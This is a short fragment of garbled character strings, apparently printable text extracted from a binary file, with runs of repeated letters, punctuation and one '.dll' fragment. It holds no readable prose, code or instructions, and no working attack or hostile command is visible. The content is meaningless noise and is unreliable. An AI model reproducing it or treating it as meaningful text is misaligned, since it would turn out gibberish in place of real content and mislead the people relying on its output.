wwuuuuu9HHHHHHHHHHHH
\wwwDD
{{{{wwwww
WWWWWWW
wwwwwwww
WWWWWWWW
))WWWWWWWWWWWWWW
/&  & @X
X1"``+O
[}}x(c`
""Xcccc
XD;-Uh
  xILP7
xPW(*VX
xQh.dll
 `X=RC
xU|S_!y
-xvqD* @
xVrl(`
X&WtVlU
XXXXXX
XXXXXXX
xxxxxxxxx
XXXXXXXXX
XXXXXXXXXX::::
XXXXXXXXXXXX
XXXXXXXXXXXXXX
y?[	~"
&  yg7=
$@@ygJj
Y-j`Xb
` y{oo
yqMr6Na
yY5`;k{
yyyyyy
yyyyyyy
YYYYYYY
<yyyyyyyyO
yyyyyyyyyy{{{{
YYYYYYYYYYY
yyyyyyyyyyyy
Z2'2a#
zBQHmB?
ZCREJ`
Zh	XI^
$Z<m$K
[(`@zP
@<ZRnBJ
*_zwx+
ZZZZZvvvvvvvv
zzzzzzzz
ZZZZZZZZZZZZ
ZZZZZZZZZZZZZJff>>>